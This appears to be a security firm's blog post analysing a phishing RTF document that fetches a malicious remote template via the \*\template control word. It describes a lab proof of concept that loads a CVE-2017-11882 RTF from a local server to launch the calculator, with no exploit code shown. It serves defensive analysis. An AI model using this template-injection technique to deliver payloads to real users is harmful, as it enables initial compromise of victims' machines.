This post was authored by Fareed.
Overview
Our team has conducted a malware analysis on an RTF malicious document detected in our client premise. The attacker has sent spearphishing targeting various of our client's emails account. The execution of the RTF file will lead to initial access to the attacker in the victim machine. The RTF file has includes a template injection technique to retrieve another malicious RTF file that serves remotely in the attacker's infrastructure. The impact of this technique will make the current RTF file replace with the malicious RTF template then the malicious code or object embedded in the new RTF template file will be executed. Thus, make the victim infected with the malicious code. We got a little bit excited at first as we have never seen an RTF attack come along with template injection.
Template injection
Based on MITRE, Adversaries may abuse this technique to initially conceal malicious
code to be executed via documents. Template references injected into a
document may enable malicious payloads to be fetched and executed when
the document is loaded. In a layman term, template injection technique able to fetch remotely malicious template on the internet to replace with the current non malicious document during the execution. Upon the execution, the template document will be open instead of the actual document.
We often see this in format of DOCX and XLSX. But in our case, it's quite rare to come across with this type of template injection attack where the attacker are leveraging RTF to conduct a remote template injection technique as we will discuss in the next sections.
Analysis
Our team first thought that the RTF comes along with malicious OLE as the RTF malicious file in the wild often abusing OLE to run their malicious code. But, upon running the tools rtfdump and rtfobj, both of the tool does not return any valuable information.
Based on Automated analysis, this RTF file have communicate with a DNS name but unfortunately, the DNS have been resolved to 127.0.0.1.
Knowing the RTF file made a request to external host, our analyst begin investigate the RTF file using text editor to find any string related to the DNS which is contain at line 14 as shown below:
Based on http://ftp.artifax.net/ArtRep/2.0/Help/rtf.htm, control word "\*\template" describes "Destination; the argument is the name of a related template file; it must be enclosed in braces. This is a destination control word.".
Reading the function of the control word, we can understand that this control word can be abuse using template injection technique as the attacker does.
Proof of concept
The NBS team tries to mimic the template injection technique by replacing the suspicious URL with the NBS team analyst's local server URL http://192.168.48.129:8000/calc which containing a malicious RTF (act as the template) that abuse CVE-2017-11882 exploit to execute the calculator app.
Once opening the RTF file, it will fetch the content (template) of page /calc from http://192.168.48.129:8000 and load the template then make the malicious code execution.
After the template was retrieved, our malicious code in the remote template will be execute. In our case, the calc.exec successfully popped up!
Conclusion
The malicious attachment which is an RTF file was attached to bait the users to run it in the client environment to gain their first initial access. RTF file nowadays can be deliver with their malicious code via this remote template injection technique as we discussed in this post.
This method able to conceal malicious code to be discovered within the document and may evade traditional Anti-Virus. The malicious template will be loaded and fetched soon after the victim opening the RTF file. The malicious RTF template potentially comes with some Microsoft Office exploits to leverage the vulnerabilities in the victims’ environment to execute the attacker's malicious code.